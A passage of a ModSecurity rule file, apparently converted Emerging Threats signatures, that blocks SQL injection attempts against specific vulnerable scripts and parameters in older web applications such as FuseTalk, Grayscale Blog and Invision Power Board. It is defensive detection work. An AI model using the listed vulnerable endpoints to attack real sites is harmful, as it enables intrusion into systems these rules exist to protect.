"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006466,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- index.cfm UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24498'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- index.cfm UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006472) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- autherror.cfm errorcode UPDATE SecRule REQUEST_LINE "@contains /forum/include/error/autherror.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006472,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- autherror.cfm errorcode UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24528'" SecRule &TX:'/SQL_INJECTION.*ARGS:errorcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- autherror.cfm errorcode UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm newsId UPDATE SecRule REQUEST_LINE "@contains /index.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006194,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm newsId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21727'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm newsId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006200) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm categoryid UPDATE SecRule REQUEST_LINE "@contains /index.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006200,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm categoryid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21727'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoryid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm categoryid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006206) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm langId UPDATE SecRule REQUEST_LINE "@contains /index.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006206,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm langId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21727'" SecRule &TX:'/SQL_INJECTION.*ARGS:langId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm langId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005335) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fuzzylime Forum SQL Injection Attempt -- low.php topic UPDATE SecRule REQUEST_LINE "@contains /low.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005335,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fuzzylime Forum SQL Injection Attempt -- low.php topic UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4062'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fuzzylime Forum SQL Injection Attempt -- low.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004004) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gazi Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE SecRule REQUEST_LINE "@contains /down_indir.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004004,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Gazi Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23714'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gazi Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004402) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaziYapBoz Game Portal SQL Injection Attempt -- kategori.asp kategori UPDATE SecRule REQUEST_LINE "@contains /kategori.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004402,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS GaziYapBoz Game Portal SQL Injection Attempt -- kategori.asp kategori UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3437'" SecRule &TX:'/SQL_INJECTION.*ARGS:kategori/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaziYapBoz Game Portal SQL Injection Attempt -- kategori.asp kategori UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GlobalMegaCorp dvddb SQL Injection Attempt -- common.php user UPDATE SecRule REQUEST_LINE "@contains /inc/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005014,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS GlobalMegaCorp dvddb SQL Injection Attempt -- common.php user UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459151/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GlobalMegaCorp dvddb SQL Injection Attempt -- common.php user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Glossaire SQL Injection Attempt -- glossaire-p-f.php sid UPDATE SecRule REQUEST_LINE "@contains /glossaire-p-f.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003845,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Glossaire SQL Injection Attempt -- glossaire-p-f.php sid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3932'" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Glossaire SQL Injection Attempt -- glossaire-p-f.php sid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004354) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UPDATE SecRule REQUEST_LINE "@contains /userdetail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004354,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004360) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php id UPDATE SecRule REQUEST_LINE "@contains /jump.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004360,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004366) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- detail.php id UPDATE SecRule REQUEST_LINE "@contains /detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004366,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- detail.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- detail.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004372) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php url UPDATE SecRule REQUEST_LINE "@contains /jump.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004372,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php url UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'" SecRule &TX:'/SQL_INJECTION.*ARGS:url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php url UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011266) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Group-Office comment_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /modules/comments/json.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011266,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Group-Office comment_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains task=comment" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:comment_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Group-Office comment_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005226) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Guo Xu Guos Posting System (GPS) SQL Injection Attempt -- print.asp id UPDATE SecRule REQUEST_LINE "@contains /print.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005226,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Guo Xu Guos Posting System (GPS) SQL Injection Attempt -- print.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3195'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Guo Xu Guos Posting System (GPS) SQL Injection Attempt -- print.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007409) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php ipadd UPDATE SecRule REQUEST_LINE "@contains /addrating.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007409,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php ipadd UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4689'" SecRule &TX:'/SQL_INJECTION.*ARGS:ipadd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php ipadd UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php url UPDATE SecRule REQUEST_LINE "@contains /addrating.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007415,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php url UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4689'" SecRule &TX:'/SQL_INJECTION.*ARGS:url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php url UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hazir Site SQL Injection Attempt -- giris_yap.asp sifre UPDATE SecRule REQUEST_LINE "@contains /giris_yap.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004426,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Hazir Site SQL Injection Attempt -- giris_yap.asp sifre UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20375'" SecRule &TX:'/SQL_INJECTION.*ARGS:sifre/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hazir Site SQL Injection Attempt -- giris_yap.asp sifre UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004634) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hunkaray Okul Portaly SQL Injection Attempt -- haberoku.asp id UPDATE SecRule REQUEST_LINE "@contains /haberoku.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004634,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Hunkaray Okul Portaly SQL Injection Attempt -- haberoku.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24288'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hunkaray Okul Portaly SQL Injection Attempt -- haberoku.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005068) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE SecRule REQUEST_LINE "@contains /oku.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005068,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3241'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005644) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- dispimage.asp id UPDATE SecRule REQUEST_LINE "@contains /dispimage.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005644,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- dispimage.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21131'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- dispimage.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005650) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp order UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005650,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21131'" SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp page UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp page UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21131'" SecRule &TX:'/SQL_INJECTION.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp page UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006867) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- rating.asp id UPDATE SecRule REQUEST_LINE "@contains /rating.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006867,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- rating.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451970/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- rating.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006873) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- meal_rest.asp mealid UPDATE SecRule REQUEST_LINE "@contains /meal_rest.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006873,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- meal_rest.asp mealid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451970/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:mealid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- meal_rest.asp mealid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- res_details.asp resid UPDATE SecRule REQUEST_LINE "@contains /res_details.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006879,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- res_details.asp resid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451970/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:resid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- res_details.asp resid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE SecRule REQUEST_LINE "@contains /classes/class_session.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004802,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2010'" SecRule &TX:'/SQL_INJECTION.*ARGS:CLIENT_IP/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006674) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- post.php img UPDATE SecRule REQUEST_LINE "@contains /forum/modules/gallery/post.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006674,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- post.php img UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453468/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:img/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- post.php img UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- index.php img UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006680,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- index.php img UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453468/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:img/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- index.php img UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Community Blog Mod SQL Injection Attempt -- entry_reply_entry.php eid UPDATE SecRule REQUEST_LINE "@contains /lib/entry_reply_entry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006686,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Community Blog Mod SQL Injection Attempt -- entry_reply_entry.php eid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453159/100/100/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:eid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Community Blog Mod SQL Injection Attempt -- entry_reply_entry.php eid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006212) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ixprim SQL Injection Attempt -- 